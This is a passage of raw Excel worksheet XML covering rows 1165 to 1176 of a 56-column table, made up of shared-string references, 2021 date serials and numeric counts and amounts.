      <c r="BB1165" t="s">
        <v>17688</v>
      </c>
      <c r="BC1165" t="s">
        <v>10029</v>
      </c>
      <c r="BD1165" t="s">
        <v>13572</v>
      </c>
    </row>
    <row r="1166" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1166">
        <v>5475</v>
      </c>
      <c r="B1166" t="s">
        <v>5079</v>
      </c>
      <c r="C1166" t="s">
        <v>99</v>
      </c>
      <c r="D1166" t="s">
        <v>8742</v>
      </c>
      <c r="E1166" t="s">
        <v>142</v>
      </c>
      <c r="F1166" t="s">
        <v>8743</v>
      </c>
      <c r="G1166" s="1">
        <v>44312</v>
      </c>
      <c r="H1166">
        <v>9694</v>
      </c>
      <c r="I1166">
        <v>9694</v>
      </c>
      <c r="J1166">
        <v>1</v>
      </c>
      <c r="K1166">
        <v>0</v>
      </c>
      <c r="L1166">
        <v>0</v>
      </c>
      <c r="M1166">
        <v>0</v>
      </c>
      <c r="N1166">
        <v>0</v>
      </c>
      <c r="O1166">
        <v>0</v>
      </c>
      <c r="P1166">
        <v>0</v>
      </c>
      <c r="Q1166">
        <v>0</v>
      </c>
      <c r="R1166">
        <v>0</v>
      </c>
      <c r="S1166">
        <v>0</v>
      </c>
      <c r="T1166">
        <v>1</v>
      </c>
      <c r="U1166">
        <v>1000</v>
      </c>
      <c r="V1166">
        <v>0</v>
      </c>
      <c r="W1166">
        <v>0</v>
      </c>
      <c r="X1166">
        <v>0</v>
      </c>
      <c r="Y1166">
        <v>0</v>
      </c>
      <c r="Z1166">
        <v>0</v>
      </c>
      <c r="AA1166">
        <v>0</v>
      </c>
      <c r="AB1166">
        <v>0</v>
      </c>
      <c r="AC1166">
        <v>0</v>
      </c>
      <c r="AD1166">
        <v>0</v>
      </c>
      <c r="AE1166">
        <v>500</v>
      </c>
      <c r="AF1166" t="s">
        <v>3412</v>
      </c>
      <c r="AG1166">
        <v>14440</v>
      </c>
      <c r="AH1166">
        <v>12</v>
      </c>
      <c r="AJ1166">
        <v>160</v>
      </c>
      <c r="AK1166" t="s">
        <v>114</v>
      </c>
      <c r="AL1166" t="s">
        <v>114</v>
      </c>
      <c r="AM1166" t="s">
        <v>8744</v>
      </c>
      <c r="AN1166" t="s">
        <v>55</v>
      </c>
      <c r="AO1166">
        <v>2017</v>
      </c>
      <c r="AP1166" t="s">
        <v>623</v>
      </c>
      <c r="AQ1166" t="s">
        <v>8745</v>
      </c>
      <c r="AR1166" t="s">
        <v>8746</v>
      </c>
      <c r="AS1166" t="s">
        <v>179</v>
      </c>
      <c r="AT1166" t="s">
        <v>58</v>
      </c>
      <c r="AU1166">
        <v>25</v>
      </c>
      <c r="AV1166">
        <v>1</v>
      </c>
      <c r="AW1166">
        <v>0</v>
      </c>
      <c r="AX1166">
        <v>0</v>
      </c>
      <c r="AY1166">
        <v>8</v>
      </c>
      <c r="AZ1166">
        <v>2</v>
      </c>
      <c r="BA1166" t="s">
        <v>17154</v>
      </c>
      <c r="BB1166">
        <v>0</v>
      </c>
      <c r="BC1166" t="s">
        <v>13424</v>
      </c>
      <c r="BD1166">
        <v>0</v>
      </c>
    </row>
    <row r="1167" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1167">
        <v>5485</v>
      </c>
      <c r="B1167" t="s">
        <v>8747</v>
      </c>
      <c r="C1167" t="s">
        <v>458</v>
      </c>
      <c r="D1167" t="s">
        <v>8748</v>
      </c>
      <c r="E1167" t="s">
        <v>3906</v>
      </c>
      <c r="F1167" t="s">
        <v>8749</v>
      </c>
      <c r="G1167" s="1">
        <v>44327</v>
      </c>
      <c r="H1167">
        <v>9724</v>
      </c>
      <c r="I1167">
        <v>9724</v>
      </c>
      <c r="J1167">
        <v>0</v>
      </c>
      <c r="K1167">
        <v>0</v>
      </c>
      <c r="L1167">
        <v>0</v>
      </c>
      <c r="M1167">
        <v>0</v>
      </c>
      <c r="N1167">
        <v>0</v>
      </c>
      <c r="O1167">
        <v>0</v>
      </c>
      <c r="P1167">
        <v>0</v>
      </c>
      <c r="Q1167">
        <v>0</v>
      </c>
      <c r="R1167">
        <v>0</v>
      </c>
      <c r="S1167">
        <v>0</v>
      </c>
      <c r="T1167">
        <v>1</v>
      </c>
      <c r="U1167">
        <v>0</v>
      </c>
      <c r="V1167">
        <v>0</v>
      </c>
      <c r="W1167">
        <v>0</v>
      </c>
      <c r="X1167">
        <v>0</v>
      </c>
      <c r="Y1167">
        <v>0</v>
      </c>
      <c r="Z1167">
        <v>0</v>
      </c>
      <c r="AA1167">
        <v>0</v>
      </c>
      <c r="AB1167">
        <v>0</v>
      </c>
      <c r="AC1167">
        <v>0</v>
      </c>
      <c r="AD1167">
        <v>0</v>
      </c>
      <c r="AE1167">
        <v>15000</v>
      </c>
      <c r="AF1167" t="s">
        <v>8750</v>
      </c>
      <c r="AG1167">
        <v>29874</v>
      </c>
      <c r="AH1167">
        <v>5</v>
      </c>
      <c r="AJ1167">
        <v>151</v>
      </c>
      <c r="AK1167" t="s">
        <v>8751</v>
      </c>
      <c r="AL1167" t="s">
        <v>8752</v>
      </c>
      <c r="AM1167" t="s">
        <v>8753</v>
      </c>
      <c r="AN1167" t="s">
        <v>68</v>
      </c>
      <c r="AO1167">
        <v>2010</v>
      </c>
      <c r="AP1167">
        <v>0</v>
      </c>
      <c r="AQ1167" t="s">
        <v>8754</v>
      </c>
      <c r="AR1167" t="s">
        <v>8750</v>
      </c>
      <c r="AS1167" t="s">
        <v>71</v>
      </c>
      <c r="AT1167" t="s">
        <v>72</v>
      </c>
      <c r="AU1167">
        <v>30</v>
      </c>
      <c r="AV1167">
        <v>1</v>
      </c>
      <c r="AW1167">
        <v>1</v>
      </c>
      <c r="AX1167">
        <v>0</v>
      </c>
      <c r="AY1167">
        <v>7</v>
      </c>
      <c r="AZ1167">
        <v>1</v>
      </c>
      <c r="BA1167" t="s">
        <v>17691</v>
      </c>
      <c r="BB1167">
        <v>0</v>
      </c>
      <c r="BC1167" t="s">
        <v>13324</v>
      </c>
      <c r="BD1167" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="1168" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1168">
        <v>5440</v>
      </c>
      <c r="B1168" t="s">
        <v>8755</v>
      </c>
      <c r="C1168" t="s">
        <v>215</v>
      </c>
      <c r="D1168" t="s">
        <v>8756</v>
      </c>
      <c r="E1168" t="s">
        <v>623</v>
      </c>
      <c r="F1168" t="s">
        <v>8757</v>
      </c>
      <c r="G1168" s="1">
        <v>44291</v>
      </c>
      <c r="H1168">
        <v>9730</v>
      </c>
      <c r="I1168">
        <v>9730</v>
      </c>
      <c r="J1168">
        <v>0</v>
      </c>
      <c r="K1168">
        <v>0</v>
      </c>
      <c r="L1168">
        <v>0</v>
      </c>
      <c r="M1168">
        <v>0</v>
      </c>
      <c r="N1168">
        <v>0</v>
      </c>
      <c r="O1168">
        <v>0</v>
      </c>
      <c r="P1168">
        <v>0</v>
      </c>
      <c r="Q1168">
        <v>1</v>
      </c>
      <c r="R1168">
        <v>0</v>
      </c>
      <c r="S1168">
        <v>0</v>
      </c>
      <c r="T1168">
        <v>0</v>
      </c>
      <c r="U1168">
        <v>0</v>
      </c>
      <c r="V1168">
        <v>0</v>
      </c>
      <c r="W1168">
        <v>0</v>
      </c>
      <c r="X1168">
        <v>0</v>
      </c>
      <c r="Y1168">
        <v>0</v>
      </c>
      <c r="Z1168">
        <v>0</v>
      </c>
      <c r="AA1168">
        <v>0</v>
      </c>
      <c r="AB1168">
        <v>25</v>
      </c>
      <c r="AC1168">
        <v>0</v>
      </c>
      <c r="AD1168">
        <v>0</v>
      </c>
      <c r="AE1168">
        <v>0</v>
      </c>
      <c r="AF1168" t="s">
        <v>8758</v>
      </c>
      <c r="AG1168">
        <v>33172</v>
      </c>
      <c r="AH1168">
        <v>6</v>
      </c>
      <c r="AJ1168">
        <v>141</v>
      </c>
      <c r="AK1168" t="s">
        <v>8759</v>
      </c>
      <c r="AL1168" t="s">
        <v>8760</v>
      </c>
      <c r="AM1168" t="s">
        <v>8761</v>
      </c>
      <c r="AN1168" t="s">
        <v>68</v>
      </c>
      <c r="AO1168">
        <v>2015</v>
      </c>
      <c r="AP1168">
        <v>82281149989</v>
      </c>
      <c r="AQ1168" t="s">
        <v>8762</v>
      </c>
      <c r="AR1168" t="s">
        <v>8758</v>
      </c>
      <c r="AS1168" t="s">
        <v>71</v>
      </c>
      <c r="AT1168" t="s">
        <v>72</v>
      </c>
      <c r="AU1168">
        <v>0</v>
      </c>
      <c r="AV1168">
        <v>0</v>
      </c>
      <c r="AW1168">
        <v>0</v>
      </c>
      <c r="AX1168">
        <v>2</v>
      </c>
      <c r="AY1168">
        <v>2</v>
      </c>
      <c r="AZ1168">
        <v>4</v>
      </c>
      <c r="BA1168" t="s">
        <v>17676</v>
      </c>
      <c r="BB1168">
        <v>0</v>
      </c>
      <c r="BC1168" t="s">
        <v>9852</v>
      </c>
      <c r="BD1168" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="1169" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1169">
        <v>5483</v>
      </c>
      <c r="B1169" t="s">
        <v>8763</v>
      </c>
      <c r="C1169" t="s">
        <v>458</v>
      </c>
      <c r="D1169" t="s">
        <v>8764</v>
      </c>
      <c r="E1169" t="s">
        <v>3906</v>
      </c>
      <c r="F1169" t="s">
        <v>8765</v>
      </c>
      <c r="G1169" s="1">
        <v>44327</v>
      </c>
      <c r="H1169">
        <v>9765</v>
      </c>
      <c r="I1169">
        <v>9765</v>
      </c>
      <c r="J1169">
        <v>0</v>
      </c>
      <c r="K1169">
        <v>0</v>
      </c>
      <c r="L1169">
        <v>0</v>
      </c>
      <c r="M1169">
        <v>0</v>
      </c>
      <c r="N1169">
        <v>0</v>
      </c>
      <c r="O1169">
        <v>0</v>
      </c>
      <c r="P1169">
        <v>0</v>
      </c>
      <c r="Q1169">
        <v>0</v>
      </c>
      <c r="R1169">
        <v>0</v>
      </c>
      <c r="S1169">
        <v>0</v>
      </c>
      <c r="T1169">
        <v>1</v>
      </c>
      <c r="U1169">
        <v>0</v>
      </c>
      <c r="V1169">
        <v>0</v>
      </c>
      <c r="W1169">
        <v>0</v>
      </c>
      <c r="X1169">
        <v>0</v>
      </c>
      <c r="Y1169">
        <v>0</v>
      </c>
      <c r="Z1169">
        <v>0</v>
      </c>
      <c r="AA1169">
        <v>0</v>
      </c>
      <c r="AB1169">
        <v>0</v>
      </c>
      <c r="AC1169">
        <v>0</v>
      </c>
      <c r="AD1169">
        <v>0</v>
      </c>
      <c r="AE1169">
        <v>4000</v>
      </c>
      <c r="AF1169" t="s">
        <v>8763</v>
      </c>
      <c r="AG1169">
        <v>29874</v>
      </c>
      <c r="AH1169">
        <v>5</v>
      </c>
      <c r="AJ1169">
        <v>151</v>
      </c>
      <c r="AK1169" t="s">
        <v>8751</v>
      </c>
      <c r="AL1169" t="s">
        <v>8752</v>
      </c>
      <c r="AM1169" t="s">
        <v>8766</v>
      </c>
      <c r="AN1169" t="s">
        <v>68</v>
      </c>
      <c r="AO1169">
        <v>2010</v>
      </c>
      <c r="AP1169">
        <v>85233958888</v>
      </c>
      <c r="AQ1169" t="s">
        <v>8767</v>
      </c>
      <c r="AR1169" t="s">
        <v>8763</v>
      </c>
      <c r="AS1169" t="s">
        <v>71</v>
      </c>
      <c r="AT1169" t="s">
        <v>72</v>
      </c>
      <c r="AU1169">
        <v>28</v>
      </c>
      <c r="AV1169">
        <v>1</v>
      </c>
      <c r="AW1169">
        <v>2</v>
      </c>
      <c r="AX1169">
        <v>0</v>
      </c>
      <c r="AY1169">
        <v>3</v>
      </c>
      <c r="AZ1169">
        <v>2</v>
      </c>
      <c r="BA1169" t="s">
        <v>17690</v>
      </c>
      <c r="BB1169">
        <v>0</v>
      </c>
      <c r="BC1169" t="s">
        <v>13648</v>
      </c>
      <c r="BD1169" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="1170" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1170">
        <v>5330</v>
      </c>
      <c r="B1170" t="s">
        <v>8768</v>
      </c>
      <c r="C1170" t="s">
        <v>60</v>
      </c>
      <c r="D1170" t="s">
        <v>8769</v>
      </c>
      <c r="E1170" t="s">
        <v>809</v>
      </c>
      <c r="F1170" t="s">
        <v>8770</v>
      </c>
      <c r="G1170" s="1">
        <v>44298</v>
      </c>
      <c r="H1170">
        <v>9771</v>
      </c>
      <c r="I1170">
        <v>9771</v>
      </c>
      <c r="J1170">
        <v>0</v>
      </c>
      <c r="K1170">
        <v>0</v>
      </c>
      <c r="L1170">
        <v>0</v>
      </c>
      <c r="M1170">
        <v>0</v>
      </c>
      <c r="N1170">
        <v>0</v>
      </c>
      <c r="O1170">
        <v>0</v>
      </c>
      <c r="P1170">
        <v>0</v>
      </c>
      <c r="Q1170">
        <v>1</v>
      </c>
      <c r="R1170">
        <v>0</v>
      </c>
      <c r="S1170">
        <v>0</v>
      </c>
      <c r="T1170">
        <v>1</v>
      </c>
      <c r="U1170">
        <v>0</v>
      </c>
      <c r="V1170">
        <v>0</v>
      </c>
      <c r="W1170">
        <v>0</v>
      </c>
      <c r="X1170">
        <v>0</v>
      </c>
      <c r="Y1170">
        <v>0</v>
      </c>
      <c r="Z1170">
        <v>0</v>
      </c>
      <c r="AA1170">
        <v>0</v>
      </c>
      <c r="AB1170">
        <v>50</v>
      </c>
      <c r="AC1170">
        <v>0</v>
      </c>
      <c r="AD1170">
        <v>0</v>
      </c>
      <c r="AE1170">
        <v>500</v>
      </c>
      <c r="AF1170" t="s">
        <v>8771</v>
      </c>
      <c r="AG1170">
        <v>35552</v>
      </c>
      <c r="AH1170">
        <v>10</v>
      </c>
      <c r="AJ1170">
        <v>128</v>
      </c>
      <c r="AK1170" t="s">
        <v>8772</v>
      </c>
      <c r="AL1170" t="s">
        <v>8773</v>
      </c>
      <c r="AM1170" t="s">
        <v>8774</v>
      </c>
      <c r="AN1170" t="s">
        <v>68</v>
      </c>
      <c r="AO1170">
        <v>1991</v>
      </c>
      <c r="AP1170">
        <v>82375054544</v>
      </c>
      <c r="AQ1170" t="s">
        <v>8775</v>
      </c>
      <c r="AR1170" t="s">
        <v>8771</v>
      </c>
      <c r="AS1170" t="s">
        <v>71</v>
      </c>
      <c r="AT1170" t="s">
        <v>72</v>
      </c>
      <c r="AU1170">
        <v>0</v>
      </c>
      <c r="AV1170">
        <v>0</v>
      </c>
      <c r="AW1170">
        <v>0</v>
      </c>
      <c r="AX1170">
        <v>5</v>
      </c>
      <c r="AY1170">
        <v>0</v>
      </c>
      <c r="AZ1170">
        <v>5</v>
      </c>
      <c r="BA1170" t="s">
        <v>17670</v>
      </c>
      <c r="BB1170">
        <v>0</v>
      </c>
      <c r="BC1170" t="s">
        <v>9870</v>
      </c>
      <c r="BD1170">
        <v>0</v>
      </c>
    </row>
    <row r="1171" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1171">
        <v>5491</v>
      </c>
      <c r="B1171" t="s">
        <v>8776</v>
      </c>
      <c r="C1171" t="s">
        <v>157</v>
      </c>
      <c r="D1171" t="s">
        <v>8777</v>
      </c>
      <c r="E1171" t="s">
        <v>1206</v>
      </c>
      <c r="F1171" t="s">
        <v>8778</v>
      </c>
      <c r="G1171" s="1">
        <v>44305</v>
      </c>
      <c r="H1171">
        <v>9780</v>
      </c>
      <c r="I1171">
        <v>9780</v>
      </c>
      <c r="J1171">
        <v>0</v>
      </c>
      <c r="K1171">
        <v>0</v>
      </c>
      <c r="L1171">
        <v>0</v>
      </c>
      <c r="M1171">
        <v>3</v>
      </c>
      <c r="N1171">
        <v>0</v>
      </c>
      <c r="O1171">
        <v>0</v>
      </c>
      <c r="P1171">
        <v>0</v>
      </c>
      <c r="Q1171">
        <v>0</v>
      </c>
      <c r="R1171">
        <v>0</v>
      </c>
      <c r="S1171">
        <v>0</v>
      </c>
      <c r="T1171">
        <v>1</v>
      </c>
      <c r="U1171">
        <v>0</v>
      </c>
      <c r="V1171">
        <v>0</v>
      </c>
      <c r="W1171">
        <v>0</v>
      </c>
      <c r="X1171">
        <v>300</v>
      </c>
      <c r="Y1171">
        <v>0</v>
      </c>
      <c r="Z1171">
        <v>0</v>
      </c>
      <c r="AA1171">
        <v>0</v>
      </c>
      <c r="AB1171">
        <v>0</v>
      </c>
      <c r="AC1171">
        <v>0</v>
      </c>
      <c r="AD1171">
        <v>0</v>
      </c>
      <c r="AE1171">
        <v>100</v>
      </c>
      <c r="AF1171" t="s">
        <v>8779</v>
      </c>
      <c r="AG1171">
        <v>69232</v>
      </c>
      <c r="AH1171">
        <v>16</v>
      </c>
      <c r="AJ1171">
        <v>255</v>
      </c>
      <c r="AK1171" t="s">
        <v>8702</v>
      </c>
      <c r="AL1171" t="s">
        <v>8780</v>
      </c>
      <c r="AM1171" t="s">
        <v>8781</v>
      </c>
      <c r="AN1171" t="s">
        <v>68</v>
      </c>
      <c r="AO1171">
        <v>2018</v>
      </c>
      <c r="AP1171" t="s">
        <v>8782</v>
      </c>
      <c r="AQ1171" t="s">
        <v>8782</v>
      </c>
      <c r="AR1171" t="s">
        <v>8779</v>
      </c>
      <c r="AS1171" t="s">
        <v>71</v>
      </c>
      <c r="AT1171" t="s">
        <v>72</v>
      </c>
      <c r="AU1171">
        <v>25</v>
      </c>
      <c r="AV1171">
        <v>1</v>
      </c>
      <c r="AW1171">
        <v>0</v>
      </c>
      <c r="AX1171">
        <v>3</v>
      </c>
      <c r="AY1171">
        <v>1</v>
      </c>
      <c r="AZ1171">
        <v>0</v>
      </c>
      <c r="BA1171" t="s">
        <v>17693</v>
      </c>
      <c r="BB1171">
        <v>0</v>
      </c>
      <c r="BC1171" t="s">
        <v>13447</v>
      </c>
      <c r="BD1171">
        <v>0</v>
      </c>
    </row>
    <row r="1172" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1172">
        <v>4819</v>
      </c>
      <c r="B1172" t="s">
        <v>4436</v>
      </c>
      <c r="C1172" t="s">
        <v>5506</v>
      </c>
      <c r="D1172" t="s">
        <v>6124</v>
      </c>
      <c r="E1172" t="s">
        <v>142</v>
      </c>
      <c r="F1172" t="s">
        <v>1564</v>
      </c>
      <c r="G1172" s="1">
        <v>44335</v>
      </c>
      <c r="H1172">
        <v>9804</v>
      </c>
      <c r="I1172">
        <v>9804</v>
      </c>
      <c r="J1172">
        <v>2</v>
      </c>
      <c r="K1172">
        <v>1</v>
      </c>
      <c r="L1172">
        <v>2</v>
      </c>
      <c r="M1172">
        <v>1</v>
      </c>
      <c r="N1172">
        <v>0</v>
      </c>
      <c r="O1172">
        <v>0</v>
      </c>
      <c r="P1172">
        <v>0</v>
      </c>
      <c r="Q1172">
        <v>2</v>
      </c>
      <c r="R1172">
        <v>2</v>
      </c>
      <c r="S1172">
        <v>0</v>
      </c>
      <c r="T1172">
        <v>2</v>
      </c>
      <c r="U1172">
        <v>5</v>
      </c>
      <c r="V1172">
        <v>100</v>
      </c>
      <c r="W1172">
        <v>10</v>
      </c>
      <c r="X1172">
        <v>100</v>
      </c>
      <c r="Y1172">
        <v>0</v>
      </c>
      <c r="Z1172">
        <v>0</v>
      </c>
      <c r="AA1172">
        <v>0</v>
      </c>
      <c r="AB1172">
        <v>100</v>
      </c>
      <c r="AC1172">
        <v>2</v>
      </c>
      <c r="AD1172">
        <v>0</v>
      </c>
      <c r="AE1172">
        <v>5000</v>
      </c>
      <c r="AF1172" t="s">
        <v>8783</v>
      </c>
      <c r="AG1172">
        <v>85226</v>
      </c>
      <c r="AH1172">
        <v>19</v>
      </c>
      <c r="AJ1172">
        <v>314</v>
      </c>
      <c r="AK1172" t="s">
        <v>6127</v>
      </c>
      <c r="AL1172" t="s">
        <v>6128</v>
      </c>
      <c r="AM1172" t="s">
        <v>8784</v>
      </c>
      <c r="AN1172" t="s">
        <v>55</v>
      </c>
      <c r="AO1172">
        <v>2018</v>
      </c>
      <c r="AP1172">
        <v>81338086869</v>
      </c>
      <c r="AQ1172" t="s">
        <v>8785</v>
      </c>
      <c r="AR1172" t="s">
        <v>8786</v>
      </c>
      <c r="AS1172" t="s">
        <v>71</v>
      </c>
      <c r="AT1172" t="s">
        <v>58</v>
      </c>
      <c r="AU1172">
        <v>26</v>
      </c>
      <c r="AV1172">
        <v>4</v>
      </c>
      <c r="AW1172">
        <v>3</v>
      </c>
      <c r="AX1172">
        <v>0</v>
      </c>
      <c r="AY1172">
        <v>14</v>
      </c>
      <c r="AZ1172">
        <v>1</v>
      </c>
      <c r="BA1172" t="s">
        <v>16870</v>
      </c>
      <c r="BB1172" t="s">
        <v>14638</v>
      </c>
      <c r="BC1172" t="s">
        <v>9550</v>
      </c>
      <c r="BD1172">
        <v>0</v>
      </c>
    </row>
    <row r="1173" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1173">
        <v>5480</v>
      </c>
      <c r="B1173" t="s">
        <v>8787</v>
      </c>
      <c r="C1173" t="s">
        <v>47</v>
      </c>
      <c r="D1173" t="s">
        <v>8788</v>
      </c>
      <c r="E1173" t="s">
        <v>142</v>
      </c>
      <c r="F1173" t="s">
        <v>8789</v>
      </c>
      <c r="G1173" s="1">
        <v>44301</v>
      </c>
      <c r="H1173">
        <v>9825</v>
      </c>
      <c r="I1173">
        <v>9825</v>
      </c>
      <c r="J1173">
        <v>6</v>
      </c>
      <c r="K1173">
        <v>0</v>
      </c>
      <c r="L1173">
        <v>8</v>
      </c>
      <c r="M1173">
        <v>4</v>
      </c>
      <c r="N1173">
        <v>0</v>
      </c>
      <c r="O1173">
        <v>0</v>
      </c>
      <c r="P1173">
        <v>0</v>
      </c>
      <c r="Q1173">
        <v>0</v>
      </c>
      <c r="R1173">
        <v>2</v>
      </c>
      <c r="S1173">
        <v>3</v>
      </c>
      <c r="T1173">
        <v>0</v>
      </c>
      <c r="U1173">
        <v>3</v>
      </c>
      <c r="V1173">
        <v>0</v>
      </c>
      <c r="W1173">
        <v>24</v>
      </c>
      <c r="X1173">
        <v>8</v>
      </c>
      <c r="Y1173">
        <v>0</v>
      </c>
      <c r="Z1173">
        <v>0</v>
      </c>
      <c r="AA1173">
        <v>0</v>
      </c>
      <c r="AB1173">
        <v>0</v>
      </c>
      <c r="AC1173">
        <v>2</v>
      </c>
      <c r="AD1173">
        <v>9</v>
      </c>
      <c r="AE1173">
        <v>0</v>
      </c>
      <c r="AF1173" t="s">
        <v>8790</v>
      </c>
      <c r="AG1173">
        <v>22616</v>
      </c>
      <c r="AH1173">
        <v>2</v>
      </c>
      <c r="AJ1173">
        <v>27</v>
      </c>
      <c r="AK1173" t="s">
        <v>2607</v>
      </c>
      <c r="AL1173" t="s">
        <v>2608</v>
      </c>
      <c r="AM1173" t="s">
        <v>8791</v>
      </c>
      <c r="AN1173" t="s">
        <v>55</v>
      </c>
      <c r="AO1173">
        <v>2010</v>
      </c>
      <c r="AP1173" t="s">
        <v>8792</v>
      </c>
      <c r="AQ1173" t="s">
        <v>8793</v>
      </c>
      <c r="AR1173" t="s">
        <v>8790</v>
      </c>
      <c r="AS1173" t="s">
        <v>71</v>
      </c>
      <c r="AT1173" t="s">
        <v>58</v>
      </c>
      <c r="AU1173">
        <v>25</v>
      </c>
      <c r="AV1173">
        <v>1</v>
      </c>
      <c r="AW1173">
        <v>86</v>
      </c>
      <c r="AX1173">
        <v>210</v>
      </c>
      <c r="AY1173">
        <v>13</v>
      </c>
      <c r="AZ1173">
        <v>18</v>
      </c>
      <c r="BA1173" t="s">
        <v>16947</v>
      </c>
      <c r="BB1173">
        <v>0</v>
      </c>
      <c r="BC1173">
        <v>0</v>
      </c>
      <c r="BD1173" t="s">
        <v>13474</v>
      </c>
    </row>
    <row r="1174" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1174">
        <v>5311</v>
      </c>
      <c r="B1174" t="s">
        <v>8794</v>
      </c>
      <c r="C1174" t="s">
        <v>579</v>
      </c>
      <c r="D1174" t="s">
        <v>8795</v>
      </c>
      <c r="E1174" t="s">
        <v>49</v>
      </c>
      <c r="F1174" t="s">
        <v>1403</v>
      </c>
      <c r="G1174" s="1">
        <v>44319</v>
      </c>
      <c r="H1174">
        <v>9861</v>
      </c>
      <c r="I1174">
        <v>9861</v>
      </c>
      <c r="J1174">
        <v>0</v>
      </c>
      <c r="K1174">
        <v>0</v>
      </c>
      <c r="L1174">
        <v>0</v>
      </c>
      <c r="M1174">
        <v>0</v>
      </c>
      <c r="N1174">
        <v>0</v>
      </c>
      <c r="O1174">
        <v>0</v>
      </c>
      <c r="P1174">
        <v>0</v>
      </c>
      <c r="Q1174">
        <v>5</v>
      </c>
      <c r="R1174">
        <v>5</v>
      </c>
      <c r="S1174">
        <v>0</v>
      </c>
      <c r="T1174">
        <v>0</v>
      </c>
      <c r="U1174">
        <v>0</v>
      </c>
      <c r="V1174">
        <v>0</v>
      </c>
      <c r="W1174">
        <v>0</v>
      </c>
      <c r="X1174">
        <v>0</v>
      </c>
      <c r="Y1174">
        <v>0</v>
      </c>
      <c r="Z1174">
        <v>0</v>
      </c>
      <c r="AA1174">
        <v>0</v>
      </c>
      <c r="AB1174">
        <v>100</v>
      </c>
      <c r="AC1174">
        <v>100</v>
      </c>
      <c r="AD1174">
        <v>0</v>
      </c>
      <c r="AE1174">
        <v>0</v>
      </c>
      <c r="AF1174" t="s">
        <v>8796</v>
      </c>
      <c r="AG1174">
        <v>73281</v>
      </c>
      <c r="AH1174">
        <v>23</v>
      </c>
      <c r="AJ1174">
        <v>356</v>
      </c>
      <c r="AK1174" t="s">
        <v>8797</v>
      </c>
      <c r="AL1174" t="s">
        <v>8798</v>
      </c>
      <c r="AM1174" t="s">
        <v>8799</v>
      </c>
      <c r="AN1174" t="s">
        <v>68</v>
      </c>
      <c r="AO1174">
        <v>2001</v>
      </c>
      <c r="AP1174">
        <v>82154539539</v>
      </c>
      <c r="AQ1174" t="s">
        <v>8800</v>
      </c>
      <c r="AR1174" t="s">
        <v>8796</v>
      </c>
      <c r="AS1174" t="s">
        <v>71</v>
      </c>
      <c r="AT1174" t="s">
        <v>72</v>
      </c>
      <c r="AU1174">
        <v>20</v>
      </c>
      <c r="AV1174">
        <v>1</v>
      </c>
      <c r="AW1174">
        <v>0</v>
      </c>
      <c r="AX1174">
        <v>6</v>
      </c>
      <c r="AY1174">
        <v>1</v>
      </c>
      <c r="AZ1174">
        <v>1</v>
      </c>
      <c r="BA1174" t="s">
        <v>17667</v>
      </c>
      <c r="BB1174" t="s">
        <v>16135</v>
      </c>
      <c r="BC1174" t="s">
        <v>13509</v>
      </c>
      <c r="BD1174" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="1175" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1175">
        <v>5504</v>
      </c>
      <c r="B1175" t="s">
        <v>2143</v>
      </c>
      <c r="C1175" t="s">
        <v>129</v>
      </c>
      <c r="D1175" t="s">
        <v>8801</v>
      </c>
      <c r="E1175" t="s">
        <v>300</v>
      </c>
      <c r="F1175" t="s">
        <v>8802</v>
      </c>
      <c r="G1175" s="1">
        <v>44355</v>
      </c>
      <c r="H1175">
        <v>9962</v>
      </c>
      <c r="I1175">
        <v>9962</v>
      </c>
      <c r="J1175">
        <v>1</v>
      </c>
      <c r="K1175">
        <v>0</v>
      </c>
      <c r="L1175">
        <v>0</v>
      </c>
      <c r="M1175">
        <v>0</v>
      </c>
      <c r="N1175">
        <v>0</v>
      </c>
      <c r="O1175">
        <v>0</v>
      </c>
      <c r="P1175">
        <v>0</v>
      </c>
      <c r="Q1175">
        <v>0</v>
      </c>
      <c r="R1175">
        <v>0</v>
      </c>
      <c r="S1175">
        <v>0</v>
      </c>
      <c r="T1175">
        <v>0</v>
      </c>
      <c r="U1175">
        <v>158000</v>
      </c>
      <c r="V1175">
        <v>0</v>
      </c>
      <c r="W1175">
        <v>0</v>
      </c>
      <c r="X1175">
        <v>0</v>
      </c>
      <c r="Y1175">
        <v>0</v>
      </c>
      <c r="Z1175">
        <v>0</v>
      </c>
      <c r="AA1175">
        <v>0</v>
      </c>
      <c r="AB1175">
        <v>0</v>
      </c>
      <c r="AC1175">
        <v>0</v>
      </c>
      <c r="AD1175">
        <v>0</v>
      </c>
      <c r="AE1175">
        <v>0</v>
      </c>
      <c r="AF1175" t="s">
        <v>2146</v>
      </c>
      <c r="AG1175">
        <v>15721</v>
      </c>
      <c r="AH1175">
        <v>11</v>
      </c>
      <c r="AJ1175">
        <v>268</v>
      </c>
      <c r="AK1175" t="s">
        <v>4981</v>
      </c>
      <c r="AL1175" t="s">
        <v>6052</v>
      </c>
      <c r="AM1175" t="s">
        <v>8803</v>
      </c>
      <c r="AN1175" t="s">
        <v>55</v>
      </c>
      <c r="AO1175">
        <v>2011</v>
      </c>
      <c r="AP1175">
        <v>81288588798</v>
      </c>
      <c r="AQ1175" t="s">
        <v>8804</v>
      </c>
      <c r="AR1175" t="s">
        <v>8805</v>
      </c>
      <c r="AS1175" t="s">
        <v>179</v>
      </c>
      <c r="AT1175" t="s">
        <v>72</v>
      </c>
      <c r="AU1175">
        <v>6</v>
      </c>
      <c r="AV1175">
        <v>2</v>
      </c>
      <c r="AW1175">
        <v>0</v>
      </c>
      <c r="AX1175">
        <v>0</v>
      </c>
      <c r="AY1175">
        <v>2</v>
      </c>
      <c r="AZ1175">
        <v>2</v>
      </c>
      <c r="BA1175" t="s">
        <v>17616</v>
      </c>
      <c r="BB1175">
        <v>0</v>
      </c>
      <c r="BC1175" t="s">
        <v>13511</v>
      </c>
      <c r="BD1175">
        <v>0</v>
      </c>
    </row>
    <row r="1176" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1176">
        <v>5098</v>
      </c>
      <c r="B1176" t="s">
